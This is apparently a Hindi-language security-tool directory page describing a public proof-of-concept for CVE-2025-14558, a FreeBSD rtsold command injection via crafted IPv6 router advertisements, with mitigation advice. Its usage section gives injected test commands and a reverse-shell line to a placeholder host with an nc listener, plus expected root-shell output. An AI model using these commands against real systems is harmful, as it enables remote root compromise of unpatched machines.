Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Blackash-CVE-2025-14558 — CVE-2025-14558 | Kitploit
उपकरण/GitHubGitHub/rockmelodies/blackash-cve-2025-14558
पेलोड जनरेशनभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubrockmelodies/blackash-cve-2025-14558

Blackash-CVE-2025-14558

CVE-2025-14558

रिपॉजिटरी देखें
38 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-14558 : FreeBSD (IPv6) में क्रिटिकल रिमोट कोड एक्सीक्यूशन

G8195ymXcAAjXC2

🧠 अवलोकन

CVE-2025-14558 एक क्रिटिकल रिमोट कोड एक्सीक्यूशन (RCE) कमजोरी है जो FreeBSD सिस्टम को प्रभावित करती है जो IPv6 राउटर सोलिसिटेशन सेवाओं का उपयोग करते हैं। अविश्वसनीय नेटवर्क इनपुट को संभालने में एक दोष हमलावरों को मनमाना शेल कमांड निष्पादित करने की अनुमति देता है।


📊 गंभीरता

  • CVSS v3 स्कोर: 9.8 / 10 🔥
  • जोखिम स्तर: क्रिटिकल
  • आवश्यक विशेषाधिकार: कोई नहीं
  • उपयोगकर्ता इंटरैक्शन: कोई नहीं

🎯 प्रभावित घटक

  • rtsol(8)
  • rtsold(8)
  • IPv6 स्टेटलेस एड्रेस ऑटोकॉन्फ़िगरेशन (SLAAC) का उपयोग करने वाले FreeBSD सिस्टम

⚙️ तकनीकी विवरण

टूल डाउनलोड करें
  • दुर्भावनापूर्ण IPv6 राउटर एडवरटाइजमेंट (RA) पैकेट एक शिल्पित डोमेन सर्च लिस्ट विकल्प शामिल कर सकते हैं
  • इनपुट resolvconf(8) को असुरक्षित रूप से पास किया जाता है
  • अनुचित शेल कोटिंग कमांड इंजेक्शन की अनुमति देती है
  • परिणामस्वरूप रूट के रूप में मनमाना कमांड निष्पादन होता है

🕸️ आक्रमण वेक्टर

  • 🌐 नेटवर्क-आधारित
  • 📍 हमलावर को उसी स्थानीय नेटवर्क सेगमेंट पर होना चाहिए
  • कोई प्रमाणीकरण या क्रेडेंशियल आवश्यक नहीं

💥 प्रभाव

यदि सफलतापूर्वक शोषण किया जाता है, तो हमलावर यह कर सकता है:

  • पूर्ण सिस्टम समझौता प्राप्त करना
  • मनमाना कमांड निष्पादित करना
  • सिस्टम कॉन्फ़िगरेशन संशोधित करना
  • स्थिरता या पार्श्व आंदोलन स्थापित करना

🧪 एक्सप्लॉइट उपलब्धता

  • ✅ सार्वजनिक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) मौजूद है
  • शिल्पित IPv6 RA पैकेट के माध्यम से कमांड निष्पादन प्रदर्शित करता है

🛡️ शमन और बचाव

दृढ़ता से अनुशंसित कार्रवाइयाँ:

  • 🔧 आधिकारिक FreeBSD सुरक्षा पैच लागू करें
  • 🚫 यदि IPv6 RA आवश्यक नहीं है तो rtsol / rtsold अक्षम करें
  • 🔒 अविश्वसनीय IPv6 राउटर एडवरटाइजमेंट को फ़िल्टर या ब्लॉक करें
  • 🧱 स्थानीय हमलावर के जोखिम को सीमित करने के लिए नेटवर्क सेगमेंटेशन का उपयोग करें

📝 मुख्य निष्कर्ष

अविश्वसनीय नेटवर्क पर IPv6 राउटर एडवरटाइजमेंट सुनने वाला कोई भी FreeBSD सिस्टम उच्च जोखिम में है। तुरंत पैच करें या प्रभावित सेवाओं को अक्षम करें।


यदि CVE-2025-14558 का PoC स्क्रिप्ट एक कमजोर FreeBSD सिस्टम (बिना पैच के, जिसमें rtsold चल रहा है और IPv6 RA संदेश प्रोसेस कर रहा है) पर सफलतापूर्वक काम करता है:

लक्ष्य पर (कमजोर FreeBSD मशीन):

  • इंजेक्ट किया गया कमांड तुरंत रूट के रूप में निष्पादित होता है (क्योंकि rtsold रूट के रूप में चलता है और दुर्भावनापूर्ण डोमेन के साथ /sbin/resolvconf को कॉल करता है)।
  • डिफ़ॉल्ट रूप से कंसोल या लॉग में कोई दृश्य आउटपुट दिखाई नहीं देता (कमांड पृष्ठभूमि में चुपचाप चलता है)।
  • क्या होता है इसके उदाहरण:
    • सरल परीक्षण के लिए जैसे --command "id > /tmp/pwned":

      • एक फ़ाइल /tmp/pwned बनाई जाती है जिसमें इस प्रकार का आउटपुट होता है:

        root@kitploit:~
        uid=0(root) gid=0(wheel) groups=0(wheel)
        
    • --command "touch /tmp/exploit_success" के लिए:

      • एक खाली फ़ाइल /tmp/exploit_success दिखाई देती है।
    • रिवर्स शेल के लिए जैसे --command "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1":

      • लक्ष्य पर कोई तत्काल दृश्य परिवर्तन नहीं, लेकिन आपके लिसनर से कनेक्शन का प्रयास होता है।

इन कमांड से लक्ष्य पर जांचें:

root@kitploit:~
ls -l /tmp/pwned
cat /tmp/pwned

हमलावर की तरफ (स्क्रिप्ट चलाने पर):

  • स्क्रिप्ट आउटपुट करती है:

    root@kitploit:~
    [+] Sending malicious RA on eth0
    [+] Injected command: id > /tmp/pwned
    [+] Target must run vulnerable rtsold and process the RA
    [+] Done. Check target for execution (e.g. /tmp/pwned)
    
    
  • रिवर्स शेल के लिए: यदि सफल होता है, तो आपका nc -lvnp 4444 एक कनेक्शन और रूट शेल प्राप्त करता है:

    root@kitploit:~
    listening on [any] 4444 ...
    connect to [YOUR_IP] from (UNKNOWN) [target_ip] XXXXX
    bash: cannot set terminal process groups: No job control in this shell
    bash: no job control in this shell
    root@vulnerable-host:~ #
    

    (अब आपके पास रूट शेल है – id, whoami, आदि जैसे कमांड टाइप करें।)

यदि यह काम नहीं करता है:

  • कोई फ़ाइल नहीं बनी/कोई कनेक्शन नहीं → कारण: लक्ष्य पैच किया गया, rtsold नहीं चल रहा, समान L2 नेटवर्क पर नहीं, फ़ायरवॉल RA को ब्लॉक कर रहा है, या IPv6 अक्षम है।

यह केवल एक नियंत्रित प्रयोगशाला में एक कमजोर (16 दिसंबर 2025 पैच से पहले) FreeBSD सिस्टम पर देखने योग्य है। 23 दिसंबर 2025 तक कोई सार्वजनिक वास्तविक दुनिया शोषण रिपोर्ट नहीं है। उत्पादन में तुरंत पैच करें।


⚠️ अस्वीकरण: यह जानकारी केवल सूचनात्मक उद्देश्यों के लिए प्रदान की गई है और यह सुरक्षा, कानूनी या परिचालन सलाह नहीं है। उपचारात्मक कार्रवाई करने से पहले हमेशा आधिकारिक विक्रेता सलाह, पैच और मार्गदर्शन की समीक्षा करें और उनका पालन करें।